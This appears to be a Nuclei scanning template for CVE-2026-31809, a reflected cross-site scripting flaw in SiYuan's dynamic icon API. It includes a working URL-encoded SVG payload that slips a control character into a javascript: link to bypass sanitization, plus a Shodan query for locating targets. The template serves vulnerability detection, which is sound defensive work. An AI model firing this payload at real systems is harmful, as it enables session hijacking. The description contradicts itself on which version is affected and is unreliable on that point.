id: CVE-2026-31809 info: name: SiYuan <= v3.5.9 - Cross Site Scripting author: 0x_Akoko severity: medium description: | SiYuan v3.5.10 contains a reflected XSS caused by improper sanitization of javascript: href attributes allowing ASCII control characters to bypass prefix checks in SVG sanitizer, letting unauthenticated attackers execute JavaScript via /api/icon/getDynamicIcon. impact: | Unauthenticated attackers can execute arbitrary JavaScript in users' browsers, leading to session hijacking or other client-side attacks. remediation: | Update to version 3.5.10 or later. reference: - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-pmc9-f5qr-2pcr - https://nvd.nist.gov/vuln/detail/CVE-2026-31809 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N cvss-score: 6.1 cve-id: CVE-2026-31809 epss-score: 0.00502 epss-percentile: 0.66366 cwe-id: CWE-79 metadata: verified: true max-request: 2 vendor: siyuan-note product: siyuan shodan-query: http.favicon.hash:-1450125239 tags: cve,cve2026,siyuan,xss,bypass flow: http(1) && http(2) http: - method: POST path: - "{{BaseURL}}/api/system/version" matchers: - type: dsl dsl: - 'status_code == 200' - 'compare_versions(ver, ">= 0.0.1", "<= 3.5.9")' condition: and internal: true extractors: - type: json name: ver json: - '.data' internal: true - method: GET path: - "{{BaseURL}}/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E%3Ca+href%3D%22java%26%239%3Bscript%3Aalert%28document.domain%29%22%3E%3Ctext+x%3D%2250%25%22+y%3D%2280%25%22+fill%3D%22red%22+style%3D%22font-size%3A60px%22%3EClick+me%3C%2Ftext%3E%3C%2Fa%3E%3Ctext%3E&color=blue" matchers-condition: and matchers: - type: word part: body words: - '' - 'id="dynamic_icon_type8' condition: and - type: word part: content_type words: - "image/svg+xml" - type: status status: - 200 # digest: 4a0a004730450220130ac1b723adde2c0d79d2e0ed15cd33d71569fda82dfea2e22bc87eb8554f74022100c3934ed2031351963b7d8466e862afcf1b133396c1ca404eb97dec2e20aad42a:922c64590222798bb761d5b6d8e72950